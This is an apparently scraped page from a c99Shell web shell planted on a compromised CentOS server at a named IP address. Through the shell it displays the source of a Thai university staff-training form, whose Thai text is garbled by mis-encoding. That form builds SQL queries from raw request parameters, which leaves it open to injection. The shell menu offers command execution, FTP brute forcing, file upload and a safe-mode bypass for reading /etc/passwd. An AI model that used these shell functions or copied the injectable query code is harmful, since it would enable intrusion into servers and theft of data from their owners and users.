110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/directorBCNU/ drwxr-xr-x Free 52.6 GB of 127.8 GB (41.16%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/ drwxr-xr-x
Free 52.6 GB of 127.8 GB (41.16%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: AddFormA.php (23.44 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

"; echo "

ЎГШіТ·УЎТГ Login ЎиН№

"; echo ""; exit(); } else { /** Configuration */ require_once( "../configuration.php" ); require_once( $_Config_absolute_path . "/includes/framework.php" ); require_once( "../include/Function.php" ); require_once( "../include/FunctionDB.php" ); /** Create Database Object */ $dbObj = new DBConn; //=== SESSION $Username = $valid_user; if(isset($_REQUEST["maNo"])) $maNo = iconv("UTF-8", "WINDOWS-874",trim($_REQUEST["maNo"])); /** Personal Data **/ $query = "SELECT * FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId LEFT JOIN position_tb ON personal_tb.PositionId = position_tb.PositionId LEFT JOIN faculty_tb ON personal_tb.Faculty_code = faculty_tb.Faculty_code WHERE Teacher_code = '".$_REQUEST["Teacher_code"]."'"; $result = $dbObj->execQuery($query); $rs1 = $dbObj->fetchArray($result); if(isset($_REQUEST["maNo"])){ /** Training Data **/ //$query = "SELECT * FROM training_tb LEFT JOIN formaoffice ON training_tb.Training_code = formaoffice.Training_code AND training_tb.Teacher_code = formaoffice.Teacher_code LEFT JOIN project_tb ON training_tb.Training_code = project_tb.Training_code AND training_tb.Teacher_code = project_tb.Teacher_code WHERE training_tb.maNo = '".$maNo."' LIMIT 1"; $query = "SELECT * FROM training_tb LEFT JOIN formaoffice ON training_tb.Training_code = formaoffice.Training_code WHERE training_tb.maNo = '".$maNo."' LIMIT 1"; $result = $dbObj->execQuery($query); $rs2 = $dbObj->fetchArray($result); } /** Personal Data(Faculty Head) **/ $query = "SELECT * FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId LEFT JOIN position_tb ON personal_tb.PositionId = position_tb.PositionId LEFT JOIN faculty_tb ON personal_tb.Faculty_code = faculty_tb.Faculty_code WHERE personal_tb.Faculty_code = '".$rs1["Faculty_code"]."' AND TeacherId = '1'"; $result = $dbObj->execQuery($query); $rs3 = $dbObj->fetchArray($result); /*----------*/ $sql = "Select * From budget_year_tb "; $result5 = mysql_query($sql) or die("Error".mysql_error()); $rs5 = mysql_fetch_array($result5); /** College Data **/ $sql = "Select * From college Where collegeStatus ='1'"; $result = mysql_query($sql) or die("Error".mysql_error()); $rs4 = mysql_fetch_array($result); $collegeName = $rs4["collegeName"]; } # else ?> ўйНБЩЕ·СиЗд»єШ¤ЕТЎГ - аѕФиБўйНБЩЕЎТГаґФ№·Т§д»ГТЄЎТГ

">Л№йТЛЕСЎ

">">ўйНБЩЕЎТГўНаґФ№·Т§д»ГТЄЎТГ

аѕФиБўйНБЩЕЎТГаґФ№·Т§д»ГТЄЎТГ

єС№·ЦЎўйН¤ЗТБ

КиЗ№ГТЄЎТГ

·Хи " size="15" readonly/>

&Budget_year=','Detail','scrollbars=yes,width=820,height=480');" title="¤ЕФкЎ·Хи№ХиаѕЧиН¤й№ЛТўйНБЩЕЎТГаґФ№·Т§д»ГТЄЎТГ">

"/>

ЗС№·Хи

аГЧиН§ ўНН№ШБСµФаґФ№·Т§д»ГТЄЎТГ

аГХВ№ јЩйНУ№ЗВЎТГ

ўйТѕаЁйТ" readonly/> µУбЛ№и§" readonly/>

КС§ЎСґ" readonly/> К¶ТєС№ѕГРєГБГТЄЄ№Ў

ўНН№ШБСµФаґФ№·Т§д»ГТЄЎТГ аГЧиН§ * " />

аґФ№·Т§вґВ /> вґВГ¶В№µмўН§·Т§ГТЄЎТГ /> Г¶В№µм»ГСєНТЎТИ /> Г¶дї /> а¤ГЧиН§єФ№ /> Г¶В№µмКиЗ№µСЗ /> Г¶ГСєЁйТ§

НйТ§µТБЛ№С§КЧНГТЄЎТГаЕў·Хи * " size="15" /> аГЧиН§ " size="65" /> " />

НйТ§µТБбј№ґУа№Ф№ЎТГ ўйН·Хи * ГТВЕРаНХВґ »Х §є»ГРБТі "/> "/> "/>

"/>

ЁУ№З№а§Ф№ * єТ·	ЗС№·Хи		¶Ц§ЗС№·Хи		БХЎУЛ№ґ /> ЗС№

вґВўНаєФЎ¤иТгЄйЁиТВг№ЎТГаґФ№·Т§д»ГТЄЎТГбЕРг№ГРЛЗиТ§ЎТГаґФ№·Т§д»ГТЄЎТГ

ўйТѕаЁйТўНБНєЛБТВг№Л№йТ·Хи гЛй јЩйГСє»ЇФєСµФ§Т№б·№

»ГРЗСµФЎТГѕСІ№Тµ№аН§

ЗСµ¶Ш»ГРК§¤маѕЧиН />ЎТГНєГБ />ЎТГИЦЎЙТґЩ§Т№ />»ГРЄШБ />КСББ№Т />№Фа·И§Т№ /> ЗФ·ВТЎГ

value="8" /> ЎГГБЎТГЗФЄТЎТГ/ЗФЄТЄХѕ value="9" /> ·Хи»ГЦЎЙТ§Т№ЗФЁСВЛГЧНЗФ·ВТ№Фѕ№ём value="10" /> јЩй·Г§¤ШіЗШІФ/аЄХиВЗЄТµГЗЁа¤ГЧиН§БЧН value="11" /> НЧи№ж

»ГРаА·ўН§ЎТГѕСІ№Т />ѕСІ№ТµТБКТВ§Т№ />ѕСІ№Тµ№аН§ /> НЧи№ж

ЁУ№З№ЄСиЗвБ§" size="4"/> бЛЕи§а§Ф№К№СєК№Ш№" size="50"/>

Л№иЗВ§Т№·ХиЁСґ" size="50" />

К¶Т№·ХиЁСґ" size="50" /> ЁС§ЛЗСґ

Е§ЄЧиН ........................................

( ) "/>

µУбЛ№и§"/>

Н№ШТµ дБиН№ШТµ

Е§ЄЧиН.................................ЛСЗЛ№йТАТ¤/ЅиТВ/Л№иЗВ

( ) "/>

µУбЛ№и§"/>

Е§ЄЧиН.............................................

ЗС№·Хи........аґЧН№.............ѕ.И........

"/> "/> "/> '"/>

freeresult($result); /** Close the Database */ $dbObj->disconn(); /** Unset Class */ unset($dbObj); ?>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]--